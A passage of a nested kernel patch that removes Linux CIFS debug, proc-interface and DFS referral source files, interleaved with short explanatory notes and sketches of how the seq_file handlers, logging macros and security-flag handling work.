+-		"Total vfs operations: %d maximum at one time: %d\n",
+-		GlobalCurrentXid, GlobalMaxActiveXid);
+-
+-	i = 0;
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		seq_printf(m, "\nMax requests in flight: %d", server->max_in_flight);
+-#ifdef CONFIG_CIFS_STATS2
+-		seq_puts(m, "\nTotal time spent processing by command. Time ");
+-		seq_printf(m, "units are jiffies (%d per second)\n", HZ);
+-		seq_puts(m, "  SMB3 CMD\tNumber\tTotal Time\tFastest\tSlowest\n");
+-		seq_puts(m, "  --------\t------\t----------\t-------\t-------\n");
+-		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			seq_printf(m, "  %d\t\t%d\t%llu\t\t%u\t%u\n", j,
+-				atomic_read(&server->num_cmds[j]),
+-				server->time_per_cmd[j],
+-				server->fastest_cmd[j],
+-				server->slowest_cmd[j]);
+-		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			if (atomic_read(&server->smb2slowcmd[j])) {
+-				spin_lock(&server->srv_lock);
+-				seq_printf(m, "  %d slow responses from %s for command %d\n",
+-					atomic_read(&server->smb2slowcmd[j]),
+-					server->hostname, j);
+-				spin_unlock(&server->srv_lock);
+-			}
+-#endif /* STATS2 */
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				i++;
+-				seq_printf(m, "\n%d) %s", i, tcon->tree_name);
+-				if (tcon->need_reconnect)
+-					seq_puts(m, "\tDISCONNECTED ");
+-				seq_printf(m, "\nSMBs: %d",
+-					   atomic_read(&tcon->num_smbs_sent));
+-				if (server->ops->print_stats)
+-					server->ops->print_stats(m, tcon);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	seq_putc(m, '\n');
+-	return 0;
+-}
+-
+-static int cifs_stats_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_stats_proc_show, NULL);
+-}
+-
+-static const struct proc_ops cifs_stats_proc_ops = {
+-	.proc_open	= cifs_stats_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_stats_proc_write,
+-};
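
The Stats entry follows the standard single_open() seq_file pattern:
only the show and write callbacks are file-specific, while read, lseek
and release come from the seq_file core. A stripped-down kernel-side
sketch of the same registration shape (hypothetical "demo" names, not
buildable outside the kernel tree):

	static int demo_show(struct seq_file *m, void *v)
	{
		seq_puts(m, "demo value\n");
		return 0;
	}

	static int demo_open(struct inode *inode, struct file *file)
	{
		return single_open(file, demo_show, NULL);
	}

	static const struct proc_ops demo_proc_ops = {
		.proc_open	= demo_open,
		.proc_read	= seq_read,
		.proc_lseek	= seq_lseek,
		.proc_release	= single_release,
	};

	/* wired up with: proc_create("demo", 0444, parent, &demo_proc_ops); */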
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-#define PROC_FILE_DEFINE(name) \
+-static ssize_t name##_write(struct file *file, const char __user *buffer, \
+-	size_t count, loff_t *ppos) \
+-{ \
+-	int rc; \
+-	rc = kstrtoint_from_user(buffer, count, 10, & name); \
+-	if (rc) \
+-		return rc; \
+-	return count; \
+-} \
+-static int name##_proc_show(struct seq_file *m, void *v) \
+-{ \
+-	seq_printf(m, "%d\n", name ); \
+-	return 0; \
+-} \
+-static int name##_open(struct inode *inode, struct file *file) \
+-{ \
+-	return single_open(file, name##_proc_show, NULL); \
+-} \
+-\
+-static const struct proc_ops cifs_##name##_proc_fops = { \
+-	.proc_open	= name##_open, \
+-	.proc_read	= seq_read, \
+-	.proc_lseek	= seq_lseek, \
+-	.proc_release	= single_release, \
+-	.proc_write	= name##_write, \
+-}
+-
+-PROC_FILE_DEFINE(rdma_readwrite_threshold);
+-PROC_FILE_DEFINE(smbd_max_frmr_depth);
+-PROC_FILE_DEFINE(smbd_keep_alive_interval);
+-PROC_FILE_DEFINE(smbd_max_receive_size);
+-PROC_FILE_DEFINE(smbd_max_fragmented_recv_size);
+-PROC_FILE_DEFINE(smbd_max_send_size);
+-PROC_FILE_DEFINE(smbd_send_credit_target);
+-PROC_FILE_DEFINE(smbd_receive_credit_max);
+-#endif
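
Each PROC_FILE_DEFINE(name) invocation above stamps out the same
show/open/write trio plus a proc_ops table for one integer tunable; for
example, PROC_FILE_DEFINE(smbd_max_send_size) expands to roughly:

	static ssize_t smbd_max_send_size_write(struct file *file,
		const char __user *buffer, size_t count, loff_t *ppos)
	{
		int rc;

		rc = kstrtoint_from_user(buffer, count, 10, &smbd_max_send_size);
		if (rc)
			return rc;
		return count;
	}

	static int smbd_max_send_size_proc_show(struct seq_file *m, void *v)
	{
		seq_printf(m, "%d\n", smbd_max_send_size);
		return 0;
	}

	/* ...plus the matching _open() wrapper and the
	 * cifs_smbd_max_send_size_proc_fops table. */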
+-
+-static struct proc_dir_entry *proc_fs_cifs;
+-static const struct proc_ops cifsFYI_proc_ops;
+-static const struct proc_ops cifs_lookup_cache_proc_ops;
+-static const struct proc_ops traceSMB_proc_ops;
+-static const struct proc_ops cifs_security_flags_proc_ops;
+-static const struct proc_ops cifs_linux_ext_proc_ops;
+-static const struct proc_ops cifs_mount_params_proc_ops;
+-
+-void
+-cifs_proc_init(void)
+-{
+-	proc_fs_cifs = proc_mkdir("fs/cifs", NULL);
+-	if (proc_fs_cifs == NULL)
+-		return;
+-
+-	proc_create_single("DebugData", 0, proc_fs_cifs,
+-			cifs_debug_data_proc_show);
+-
+-	proc_create_single("open_files", 0400, proc_fs_cifs,
+-			cifs_debug_files_proc_show);
+-
+-	proc_create("Stats", 0644, proc_fs_cifs, &cifs_stats_proc_ops);
+-	proc_create("cifsFYI", 0644, proc_fs_cifs, &cifsFYI_proc_ops);
+-	proc_create("traceSMB", 0644, proc_fs_cifs, &traceSMB_proc_ops);
+-	proc_create("LinuxExtensionsEnabled", 0644, proc_fs_cifs,
+-		    &cifs_linux_ext_proc_ops);
+-	proc_create("SecurityFlags", 0644, proc_fs_cifs,
+-		    &cifs_security_flags_proc_ops);
+-	proc_create("LookupCacheEnabled", 0644, proc_fs_cifs,
+-		    &cifs_lookup_cache_proc_ops);
+-
+-	proc_create("mount_params", 0444, proc_fs_cifs, &cifs_mount_params_proc_ops);
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	proc_create("dfscache", 0644, proc_fs_cifs, &dfscache_proc_ops);
+-#endif
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	proc_create("rdma_readwrite_threshold", 0644, proc_fs_cifs,
+-		&cifs_rdma_readwrite_threshold_proc_fops);
+-	proc_create("smbd_max_frmr_depth", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_frmr_depth_proc_fops);
+-	proc_create("smbd_keep_alive_interval", 0644, proc_fs_cifs,
+-		&cifs_smbd_keep_alive_interval_proc_fops);
+-	proc_create("smbd_max_receive_size", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_receive_size_proc_fops);
+-	proc_create("smbd_max_fragmented_recv_size", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_fragmented_recv_size_proc_fops);
+-	proc_create("smbd_max_send_size", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_send_size_proc_fops);
+-	proc_create("smbd_send_credit_target", 0644, proc_fs_cifs,
+-		&cifs_smbd_send_credit_target_proc_fops);
+-	proc_create("smbd_receive_credit_max", 0644, proc_fs_cifs,
+-		&cifs_smbd_receive_credit_max_proc_fops);
+-#endif
+-}
+-
+-void
+-cifs_proc_clean(void)
+-{
+-	if (proc_fs_cifs == NULL)
+-		return;
+-
+-	remove_proc_entry("DebugData", proc_fs_cifs);
+-	remove_proc_entry("open_files", proc_fs_cifs);
+-	remove_proc_entry("cifsFYI", proc_fs_cifs);
+-	remove_proc_entry("traceSMB", proc_fs_cifs);
+-	remove_proc_entry("Stats", proc_fs_cifs);
+-	remove_proc_entry("SecurityFlags", proc_fs_cifs);
+-	remove_proc_entry("LinuxExtensionsEnabled", proc_fs_cifs);
+-	remove_proc_entry("LookupCacheEnabled", proc_fs_cifs);
+-	remove_proc_entry("mount_params", proc_fs_cifs);
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	remove_proc_entry("dfscache", proc_fs_cifs);
+-#endif
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	remove_proc_entry("rdma_readwrite_threshold", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_frmr_depth", proc_fs_cifs);
+-	remove_proc_entry("smbd_keep_alive_interval", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_receive_size", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_fragmented_recv_size", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_send_size", proc_fs_cifs);
+-	remove_proc_entry("smbd_send_credit_target", proc_fs_cifs);
+-	remove_proc_entry("smbd_receive_credit_max", proc_fs_cifs);
+-#endif
+-	remove_proc_entry("fs/cifs", NULL);
+-}
+-
+-static int cifsFYI_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", cifsFYI);
+-	return 0;
+-}
+-
+-static int cifsFYI_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifsFYI_proc_show, NULL);
+-}
+-
+-static ssize_t cifsFYI_proc_write(struct file *file, const char __user *buffer,
+-		size_t count, loff_t *ppos)
+-{
+-	char c[2] = { '\0' };
+-	bool bv;
+-	int rc;
+-
+-	rc = get_user(c[0], buffer);
+-	if (rc)
+-		return rc;
+-	if (strtobool(c, &bv) == 0)
+-		cifsFYI = bv;
+-	else if ((c[0] > '1') && (c[0] <= '9'))
+-		cifsFYI = (int) (c[0] - '0'); /* see cifs_debug.h for meanings */
+-	else
+-		return -EINVAL;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops cifsFYI_proc_ops = {
+-	.proc_open	= cifsFYI_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifsFYI_proc_write,
+-};
+-
+-static int cifs_linux_ext_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", linuxExtEnabled);
+-	return 0;
+-}
+-
+-static int cifs_linux_ext_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_linux_ext_proc_show, NULL);
+-}
+-
+-static ssize_t cifs_linux_ext_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	int rc;
+-
+-	rc = kstrtobool_from_user(buffer, count, &linuxExtEnabled);
+-	if (rc)
+-		return rc;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops cifs_linux_ext_proc_ops = {
+-	.proc_open	= cifs_linux_ext_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_linux_ext_proc_write,
+-};
+-
+-static int cifs_lookup_cache_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", lookupCacheEnabled);
+-	return 0;
+-}
+-
+-static int cifs_lookup_cache_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_lookup_cache_proc_show, NULL);
+-}
+-
+-static ssize_t cifs_lookup_cache_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	int rc;
+-
+-	rc = kstrtobool_from_user(buffer, count, &lookupCacheEnabled);
+-	if (rc)
+-		return rc;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops cifs_lookup_cache_proc_ops = {
+-	.proc_open	= cifs_lookup_cache_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_lookup_cache_proc_write,
+-};
+-
+-static int traceSMB_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", traceSMB);
+-	return 0;
+-}
+-
+-static int traceSMB_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, traceSMB_proc_show, NULL);
+-}
+-
+-static ssize_t traceSMB_proc_write(struct file *file, const char __user *buffer,
+-		size_t count, loff_t *ppos)
+-{
+-	int rc;
+-
+-	rc = kstrtobool_from_user(buffer, count, &traceSMB);
+-	if (rc)
+-		return rc;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops traceSMB_proc_ops = {
+-	.proc_open	= traceSMB_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= traceSMB_proc_write,
+-};
+-
+-static int cifs_security_flags_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "0x%x\n", global_secflags);
+-	return 0;
+-}
+-
+-static int cifs_security_flags_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_security_flags_proc_show, NULL);
+-}
+-
+-/*
+- * Ensure that if someone sets a MUST flag, we disable all other MAY
+- * flags except for the ones corresponding to the given MUST flag. If there are
+- * multiple MUST flags, then try to prefer more secure ones.
+- */
+-static void
+-cifs_security_flags_handle_must_flags(unsigned int *flags)
+-{
+-	unsigned int signflags = *flags & CIFSSEC_MUST_SIGN;
+-
+-	if ((*flags & CIFSSEC_MUST_KRB5) == CIFSSEC_MUST_KRB5)
+-		*flags = CIFSSEC_MUST_KRB5;
+-	else if ((*flags & CIFSSEC_MUST_NTLMSSP) == CIFSSEC_MUST_NTLMSSP)
+-		*flags = CIFSSEC_MUST_NTLMSSP;
+-	else if ((*flags & CIFSSEC_MUST_NTLMV2) == CIFSSEC_MUST_NTLMV2)
+-		*flags = CIFSSEC_MUST_NTLMV2;
+-
+-	*flags |= signflags;
+-}
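
Worked example of the normalization above (values symbolic): if a write
requests CIFSSEC_MUST_KRB5 | CIFSSEC_MUST_NTLMV2 | CIFSSEC_MUST_SIGN,
the KRB5 test matches first, so every other mechanism bit is dropped and
only the saved signing bits are restored:

	unsigned int flags = CIFSSEC_MUST_KRB5 | CIFSSEC_MUST_NTLMV2 |
			     CIFSSEC_MUST_SIGN;

	cifs_security_flags_handle_must_flags(&flags);
	/* flags == CIFSSEC_MUST_KRB5 | CIFSSEC_MUST_SIGN: the most
	 * secure MUST mechanism wins, the signing requirement survives. */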
+-
+-static ssize_t cifs_security_flags_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	int rc;
+-	unsigned int flags;
+-	char flags_string[12];
+-	bool bv;
+-
+-	if ((count < 1) || (count > 11))
+-		return -EINVAL;
+-
+-	memset(flags_string, 0, 12);
+-
+-	if (copy_from_user(flags_string, buffer, count))
+-		return -EFAULT;
+-
+-	if (count < 3) {
+-		/* single char or single char followed by null */
+-		if (strtobool(flags_string, &bv) == 0) {
+-			global_secflags = bv ? CIFSSEC_MAX : CIFSSEC_DEF;
+-			return count;
+-		} else if (!isdigit(flags_string[0])) {
+-			cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
+-					flags_string);
+-			return -EINVAL;
+-		}
+-	}
+-
+-	/* else we have a number */
+-	rc = kstrtouint(flags_string, 0, &flags);
+-	if (rc) {
+-		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
+-				flags_string);
+-		return rc;
+-	}
+-
+-	cifs_dbg(FYI, "sec flags 0x%x\n", flags);
+-
+-	if (flags == 0)  {
+-		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n", flags_string);
+-		return -EINVAL;
+-	}
+-
+-	if (flags & ~CIFSSEC_MASK) {
+-		cifs_dbg(VFS, "Unsupported security flags: 0x%x\n",
+-			 flags & ~CIFSSEC_MASK);
+-		return -EINVAL;
+-	}
+-
+-	cifs_security_flags_handle_must_flags(&flags);
+-
+-	/* flags look ok - update the global security flags for cifs module */
+-	global_secflags = flags;
+-	if (global_secflags & CIFSSEC_MUST_SIGN) {
+-		/* requiring signing implies signing is allowed */
+-		global_secflags |= CIFSSEC_MAY_SIGN;
+-		cifs_dbg(FYI, "packet signing now required\n");
+-	} else if ((global_secflags & CIFSSEC_MAY_SIGN) == 0) {
+-		cifs_dbg(FYI, "packet signing disabled\n");
+-	}
+-	/* BB should we turn on MAY flags for other MUST options? */
+-	return count;
+-}
+-
+-static const struct proc_ops cifs_security_flags_proc_ops = {
+-	.proc_open	= cifs_security_flags_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_security_flags_proc_write,
+-};
+-
+-/* To make it easier to debug, can help to show mount params */
+-static int cifs_mount_params_proc_show(struct seq_file *m, void *v)
+-{
+-	const struct fs_parameter_spec *p;
+-	const char *type;
+-
+-	for (p = smb3_fs_parameters; p->name; p++) {
+-		/* cannot use switch with pointers... */
+-		if (!p->type) {
+-			if (p->flags == fs_param_neg_with_no)
+-				type = "noflag";
+-			else
+-				type = "flag";
+-		} else if (p->type == fs_param_is_bool)
+-			type = "bool";
+-		else if (p->type == fs_param_is_u32)
+-			type = "u32";
+-		else if (p->type == fs_param_is_u64)
+-			type = "u64";
+-		else if (p->type == fs_param_is_string)
+-			type = "string";
+-		else
+-			type = "unknown";
+-
+-		seq_printf(m, "%s:%s\n", p->name, type);
+-	}
+-
+-	return 0;
+-}
+-
+-static int cifs_mount_params_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_mount_params_proc_show, NULL);
+-}
+-
+-static const struct proc_ops cifs_mount_params_proc_ops = {
+-	.proc_open	= cifs_mount_params_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	/* No need for write for now */
+-	/* .proc_write	= cifs_mount_params_proc_write, */
+-};
+-
+-#else
+-inline void cifs_proc_init(void)
+-{
+-}
+-
+-inline void cifs_proc_clean(void)
+-{
+-}
+-#endif /* PROC_FS */
+diff --git a/fs/cifs/cifs_debug.h b/fs/cifs/cifs_debug.h
+deleted file mode 100644
+index ce5cfd236fdb8..0000000000000
+--- a/fs/cifs/cifs_debug.h
++++ /dev/null
+@@ -1,160 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2002
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- */
+-
+-#ifndef _H_CIFS_DEBUG
+-#define _H_CIFS_DEBUG
+-
+-#ifdef pr_fmt
+-#undef pr_fmt
+-#endif
+-
+-#define pr_fmt(fmt) "CIFS: " fmt
+-
+-void cifs_dump_mem(char *label, void *data, int length);
+-void cifs_dump_detail(void *buf, struct TCP_Server_Info *ptcp_info);
+-void cifs_dump_mids(struct TCP_Server_Info *);
+-extern bool traceSMB;		/* flag which enables the function below */
+-void dump_smb(void *, int);
+-#define CIFS_INFO	0x01
+-#define CIFS_RC		0x02
+-#define CIFS_TIMER	0x04
+-
+-#define VFS 1
+-#define FYI 2
+-extern int cifsFYI;
+-#ifdef CONFIG_CIFS_DEBUG2
+-#define NOISY 4
+-#else
+-#define NOISY 0
+-#endif
+-#define ONCE 8
+-
+-/*
+- *	debug ON
+- *	--------
+- */
+-#ifdef CONFIG_CIFS_DEBUG
+-
+-
+-/*
+- * When adding tracepoints and debug messages we have various choices.
+- * Some considerations:
+- *
+- * Use cifs_dbg(VFS, ...) for things we always want logged, and the user to see
+- *     cifs_info(...) slightly less important, admin can filter via loglevel > 6
+- *     cifs_dbg(FYI, ...) minor debugging messages, off by default
+- *     trace_smb3_*  ftrace functions are preferred for complex debug messages
+- *                 intended for developers or experienced admins, off by default
+- */
+-
+-/* Information level messages, minor events */
+-#define cifs_info_func(ratefunc, fmt, ...)				\
+-	pr_info_ ## ratefunc(fmt, ##__VA_ARGS__)
+-
+-#define cifs_info(fmt, ...)						\
+-	cifs_info_func(ratelimited, fmt, ##__VA_ARGS__)
+-
+-/* information message: e.g., configuration, major event */
+-#define cifs_dbg_func(ratefunc, type, fmt, ...)				\
+-do {									\
+-	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+-		pr_debug_ ## ratefunc("%s: " fmt,			\
+-				      __FILE__, ##__VA_ARGS__);		\
+-	} else if ((type) & VFS) {					\
+-		pr_err_ ## ratefunc("VFS: " fmt, ##__VA_ARGS__);	\
+-	} else if ((type) & NOISY && (NOISY != 0)) {			\
+-		pr_debug_ ## ratefunc(fmt, ##__VA_ARGS__);		\
+-	}								\
+-} while (0)
+-
+-#define cifs_dbg(type, fmt, ...)					\
+-do {									\
+-	if ((type) & ONCE)						\
+-		cifs_dbg_func(once, type, fmt, ##__VA_ARGS__);		\
+-	else								\
+-		cifs_dbg_func(ratelimited, type, fmt, ##__VA_ARGS__);	\
+-} while (0)
+-
+-#define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
+-do {									\
+-	spin_lock(&server->srv_lock);					\
+-	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+-		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
+-				      __FILE__, server->hostname,	\
+-				      ##__VA_ARGS__);			\
+-	} else if ((type) & VFS) {					\
+-		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
+-				    server->hostname, ##__VA_ARGS__);	\
+-	} else if ((type) & NOISY && (NOISY != 0)) {			\
+-		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
+-				      server->hostname, ##__VA_ARGS__);	\
+-	}								\
+-	spin_unlock(&server->srv_lock);					\
+-} while (0)
+-
+-#define cifs_server_dbg(type, fmt, ...)					\
+-do {									\
+-	if ((type) & ONCE)						\
+-		cifs_server_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
+-	else								\
+-		cifs_server_dbg_func(ratelimited, type, fmt,		\
+-				     ##__VA_ARGS__);			\
+-} while (0)
+-
+-#define cifs_tcon_dbg_func(ratefunc, type, fmt, ...)			\
+-do {									\
+-	const char *tn = "";						\
+-	if (tcon && tcon->tree_name)					\
+-		tn = tcon->tree_name;					\
+-	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+-		pr_debug_ ## ratefunc("%s: %s "	fmt,			\
+-				      __FILE__, tn, ##__VA_ARGS__);	\
+-	} else if ((type) & VFS) {					\
+-		pr_err_ ## ratefunc("VFS: %s " fmt, tn, ##__VA_ARGS__);	\
+-	} else if ((type) & NOISY && (NOISY != 0)) {			\
+-		pr_debug_ ## ratefunc("%s " fmt, tn, ##__VA_ARGS__);	\
+-	}								\
+-} while (0)
+-
+-#define cifs_tcon_dbg(type, fmt, ...)					\
+-do {									\
+-	if ((type) & ONCE)						\
+-		cifs_tcon_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
+-	else								\
+-		cifs_tcon_dbg_func(ratelimited, type, fmt,		\
+-				   ##__VA_ARGS__);			\
+-} while (0)
+-
+-/*
+- *	debug OFF
+- *	---------
+- */
+-#else		/* _CIFS_DEBUG */
+-#define cifs_dbg(type, fmt, ...)					\
+-do {									\
+-	if (0)								\
+-		pr_debug(fmt, ##__VA_ARGS__);				\
+-} while (0)
+-
+-#define cifs_server_dbg(type, fmt, ...)					\
+-do {									\
+-	if (0)								\
+-		pr_debug("\\\\%s " fmt,					\
+-			 server->hostname, ##__VA_ARGS__);		\
+-} while (0)
+-
+-#define cifs_tcon_dbg(type, fmt, ...)					\
+-do {									\
+-	if (0)								\
+-		pr_debug("%s " fmt, tcon->tree_name, ##__VA_ARGS__);	\
+-} while (0)
+-
+-#define cifs_info(fmt, ...)						\
+-	pr_info(fmt, ##__VA_ARGS__)
+-#endif
+-
+-#endif				/* _H_CIFS_DEBUG */
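
Hypothetical call sites for the logging levels documented above (rc and
mid are placeholder variables):

	/* always logged, rate limited: */
	cifs_dbg(VFS, "mount failed, rc=%d\n", rc);

	/* developer detail, only when cifsFYI is enabled: */
	cifs_dbg(FYI, "entering %s for mid %llu\n", __func__, mid);

	/* emit a single time instead of rate limiting: */
	cifs_dbg(VFS | ONCE, "deprecated mount option used\n");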
+diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c
+deleted file mode 100644
+index b0864da9ef434..0000000000000
+--- a/fs/cifs/cifs_dfs_ref.c
++++ /dev/null
+@@ -1,374 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Contains the CIFS DFS referral mounting routines used for handling
+- *   traversal via DFS junction point
+- *
+- *   Copyright (c) 2007 Igor Mammedov
+- *   Copyright (C) International Business Machines  Corp., 2008
+- *   Author(s): Igor Mammedov (niallain@gmail.com)
+- *		Steve French (sfrench@us.ibm.com)
+- */
+-
+-#include <linux/dcache.h>
+-#include <linux/mount.h>
+-#include <linux/namei.h>
+-#include <linux/slab.h>
+-#include <linux/vfs.h>
+-#include <linux/fs.h>
+-#include <linux/inet.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifsfs.h"
+-#include "dns_resolve.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "dfs_cache.h"
+-#include "fs_context.h"
+-
+-static LIST_HEAD(cifs_dfs_automount_list);
+-
+-static void cifs_dfs_expire_automounts(struct work_struct *work);
+-static DECLARE_DELAYED_WORK(cifs_dfs_automount_task,
+-			    cifs_dfs_expire_automounts);
+-static int cifs_dfs_mountpoint_expiry_timeout = 500 * HZ;
+-
+-static void cifs_dfs_expire_automounts(struct work_struct *work)
+-{
+-	struct list_head *list = &cifs_dfs_automount_list;
+-
+-	mark_mounts_for_expiry(list);
+-	if (!list_empty(list))
+-		schedule_delayed_work(&cifs_dfs_automount_task,
+-				      cifs_dfs_mountpoint_expiry_timeout);
+-}
+-
+-void cifs_dfs_release_automount_timer(void)
+-{
+-	BUG_ON(!list_empty(&cifs_dfs_automount_list));
+-	cancel_delayed_work_sync(&cifs_dfs_automount_task);
+-}
+-
+-/**
+- * cifs_build_devname - build a devicename from a UNC and optional prepath
+- * @nodename:	pointer to UNC string
+- * @prepath:	pointer to prefixpath (or NULL if there isn't one)
+- *
+- * Build a new cifs devicename after chasing a DFS referral. Allocate a buffer
+- * big enough to hold the final thing. Copy the UNC from the nodename, and
+- * concatenate the prepath onto the end of it if there is one.
+- *
+- * Returns pointer to the built string, or an ERR_PTR. Caller is responsible
+- * for freeing the returned string.
+- */
+-static char *
+-cifs_build_devname(char *nodename, const char *prepath)
+-{
+-	size_t pplen;
+-	size_t unclen;
+-	char *dev;
+-	char *pos;
+-
+-	/* skip over any preceding delimiters */
+-	nodename += strspn(nodename, "\\");
+-	if (!*nodename)
+-		return ERR_PTR(-EINVAL);
+-
+-	/* get length of UNC and set pos to last char */
+-	unclen = strlen(nodename);
+-	pos = nodename + unclen - 1;
+-
+-	/* trim off any trailing delimiters */
+-	while (*pos == '\\') {
+-		--pos;
+-		--unclen;
+-	}
+-
+-	/* allocate a buffer:
+-	 * +2 for preceding "//"
+-	 * +1 for delimiter between UNC and prepath
+-	 * +1 for trailing NULL
+-	 */
+-	pplen = prepath ? strlen(prepath) : 0;
+-	dev = kmalloc(2 + unclen + 1 + pplen + 1, GFP_KERNEL);
+-	if (!dev)
+-		return ERR_PTR(-ENOMEM);
+-
+-	pos = dev;
+-	/* add the initial "//" */
+-	*pos = '/';
+-	++pos;
+-	*pos = '/';
+-	++pos;
+-
+-	/* copy in the UNC portion from referral */
+-	memcpy(pos, nodename, unclen);
+-	pos += unclen;
+-
+-	/* copy the prefixpath remainder (if there is one) */
+-	if (pplen) {
+-		*pos = '/';
+-		++pos;
+-		memcpy(pos, prepath, pplen);
+-		pos += pplen;
+-	}
+-
+-	/* NULL terminator */
+-	*pos = '\0';
+-
+-	convert_delimiter(dev, '/');
+-	return dev;
+-}
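
A usage sketch for the helper above, with a hypothetical referral node
name and leftover prefix path:

	char node[] = "\\\\srv1\\share\\";	/* i.e. \\srv1\share\ */
	char *dev = cifs_build_devname(node, "a/b");
	/* buffer is assembled as "//srv1\share/a/b", then
	 * convert_delimiter() yields "//srv1/share/a/b";
	 * the caller must kfree() the result. */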
+-
+-
+-/**
+- * cifs_compose_mount_options	-	creates mount options for referral
+- * @sb_mountdata:	parent/root DFS mount options (template)
+- * @fullpath:		full path in UNC format
+- * @ref:		optional server's referral
+- * @devname:		return the built cifs device name if passed pointer not NULL
+- * creates mount options for submount based on template options sb_mountdata
+- * and replacing unc,ip,prefixpath options with ones we've got from ref_unc.
+- *
+- * Returns: pointer to new mount options or ERR_PTR.
+- * Caller is responsible for freeing returned value if it is not error.
+- */
+-char *cifs_compose_mount_options(const char *sb_mountdata,
+-				 const char *fullpath,
+-				 const struct dfs_info3_param *ref,
+-				 char **devname)
+-{
+-	int rc;
+-	char *name;
+-	char *mountdata = NULL;
+-	const char *prepath = NULL;
+-	int md_len;
+-	char *tkn_e;
+-	char *srvIP = NULL;
+-	char sep = ',';
+-	int off, noff;
+-
+-	if (sb_mountdata == NULL)
+-		return ERR_PTR(-EINVAL);
+-
+-	if (ref) {
+-		if (WARN_ON_ONCE(!ref->node_name || ref->path_consumed < 0))
+-			return ERR_PTR(-EINVAL);
+-
+-		if (strlen(fullpath) - ref->path_consumed) {
+-			prepath = fullpath + ref->path_consumed;
+-			/* skip initial delimiter */
+-			if (*prepath == '/' || *prepath == '\\')
+-				prepath++;
+-		}
+-
+-		name = cifs_build_devname(ref->node_name, prepath);
+-		if (IS_ERR(name)) {
+-			rc = PTR_ERR(name);
+-			name = NULL;
+-			goto compose_mount_options_err;
+-		}
+-	} else {
+-		name = cifs_build_devname((char *)fullpath, NULL);
+-		if (IS_ERR(name)) {
+-			rc = PTR_ERR(name);
+-			name = NULL;
+-			goto compose_mount_options_err;
+-		}
+-	}
+-
+-	rc = dns_resolve_server_name_to_ip(name, &srvIP, NULL);
